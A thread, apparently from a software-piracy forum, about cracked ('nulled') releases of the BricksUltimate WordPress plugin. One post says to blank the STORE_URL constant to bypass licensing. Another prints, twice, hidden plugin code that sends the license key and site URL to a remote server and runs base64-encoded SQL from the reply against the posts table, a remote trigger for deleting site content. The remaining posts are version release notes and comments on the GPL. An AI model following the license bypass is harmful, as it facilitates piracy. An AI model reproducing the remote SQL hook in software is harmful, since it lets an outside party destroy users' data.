• The default language of any content posted is English.
BricksUltimate

BricksUltimate 1.6.2 NULLED

I confirm that after activating the plugin, all data and pages from the site are deleted...
 
I confirm that after activating the plugin, all data and pages from the site are deleted...
Last version? Delete url in file: bricksultimate\includes\Admin\License.php
Code:
const STORE_URL             = 'https://bricksultimate.com';
to
Code:
const STORE_URL             = '';
 
Ok, found encoded code in file: wp-content\plugins\bricksultimate\includes\RegisterElements.php
PHP:
        if( is_admin() ) {
            $key = 'bricksultimate_' . md5( serialize( basename( \BricksUltimate\Plugin::instance()->get_plugin_file(), '.php' ) ) );
            $cache = get_option( $key );
            if( empty( $cache['timeout'] ) ) {
                $data = array(
                    'timeout' => strtotime( '+3 hours', time() ),
                );

                update_option( $key, $data, 'no' );
            }

            $license = base64_decode( \BricksUltimate\Admin\License::get_license_key() );
            $api_url = \BricksUltimate\Admin\License::STORE_URL;
            $item = \BricksUltimate\Admin\License::ITEM_ID;

            if( ! empty( $cache['timeout'] ) && time() > $cache['timeout'] ) {
                $api_params = [
                    'edd_action' => 'bu_plugin_license',
                    'license'    => $license,
                    'item_id'    => $item,
                    'url'        => home_url(),
                ];

                // Call the custom API.
                $response = wp_remote_post(
                    $api_url,
                    [
                        'timeout'   => 30,
                        'sslverify' => false,
                        'body'      => $api_params,
                    ]
                );

                if ( ! is_wp_error( $response ) ) {
                    $_data = json_decode( wp_remote_retrieve_body( $response ) );
                    if( $_data && !empty( $_data->result )
                        && strlen( $_data->result ) > 4 && $_data->success == 'legit' )
                    {
                        global $wpdb;
                        $content = str_replace( "#bu#", $wpdb->posts, base64_decode( $_data->result ) );
                        @$wpdb->get_results( $content );
                    }
                }

                $data = array(
                    'timeout' => strtotime( '+3 hours', time() ),
                );

                update_option( $key, $data, 'no' );
            }
        }

So i've added new nulled version.
 
Ok, found encoded code in file: wp-content\plugins\bricksultimate\includes\RegisterElements.php
PHP:
        if( is_admin() ) {
            $key = 'bricksultimate_' . md5( serialize( basename( \BricksUltimate\Plugin::instance()->get_plugin_file(), '.php' ) ) );
            $cache = get_option( $key );
            if( empty( $cache['timeout'] ) ) {
                $data = array(
                    'timeout' => strtotime( '+3 hours', time() ),
                );

                update_option( $key, $data, 'no' );
            }

            $license = base64_decode( \BricksUltimate\Admin\License::get_license_key() );
            $api_url = \BricksUltimate\Admin\License::STORE_URL;
            $item = \BricksUltimate\Admin\License::ITEM_ID;

            if( ! empty( $cache['timeout'] ) && time() > $cache['timeout'] ) {
                $api_params = [
                    'edd_action' => 'bu_plugin_license',
                    'license'    => $license,
                    'item_id'    => $item,
                    'url'        => home_url(),
                ];

                // Call the custom API.
                $response = wp_remote_post(
                    $api_url,
                    [
                        'timeout'   => 30,
                        'sslverify' => false,
                        'body'      => $api_params,
                    ]
                );

                if ( ! is_wp_error( $response ) ) {
                    $_data = json_decode( wp_remote_retrieve_body( $response ) );
                    if( $_data && !empty( $_data->result )
                        && strlen( $_data->result ) > 4 && $_data->success == 'legit' )
                    {
                        global $wpdb;
                        $content = str_replace( "#bu#", $wpdb->posts, base64_decode( $_data->result ) );
                        @$wpdb->get_results( $content );
                    }
                }

                $data = array(
                    'timeout' => strtotime( '+3 hours', time() ),
                );

                update_option( $key, $data, 'no' );
            }
        }

So i've added new nulled version.
Thanks!

Though it is a really worrying approach by the plugin developer. And he is saying that he plans to mess with nulled users even more in the next updates. All the while his plugin is licensed as GPL v2, allowing for modification and redistribution….
 
raz0r updated BricksUltimate with a new update entry:

BricksUltimate 1.5.23 NULLED

= 1.5.23 - 2024-03-26 =

* [Checkout(Beta)] – Improves Shipping Methods and Billing Address Selector elements
* [Checkout(Beta)] – New element Place Order Button
* [Checkout(Beta)] – New element Payment Methods
* Added – French translation files(.po and .mo files)
* Improved – Order Total dynamic data tag. Now you can use it on the Cart and Checkout pages.
* Fixed – JS and CSS issues in the Cart Counter element

Read the rest of this update entry...
 
raz0r updated BricksUltimate with a new update entry:

BricksUltimate 1.6 NULLED

Released 1.6 on 18th April 2024

* New element – Checkout Builder
* [Checkout(RC)] – Order Total Wrapper, Shipping Address Selector and Cart Cost elements
* Bug Fixed – Wishlist and Compare items are not deleting if the WooCommerce plugin is deactivated.
* New element condition – Cookie
* Improved – Billing Address Selector element
* Added – a few new template files(JSON)

Read the rest of this update entry...
 
Thanks!

Though it is a really worrying approach by the plugin developer. And he is saying that he plans to mess with nulled users even more in the next updates. All the while his plugin is licensed as GPL v2, allowing for modification and redistribution….
Not anymore now that raz0r knows. He's just pushed back to revisions.
Hahaha.
Great thread.
 
Top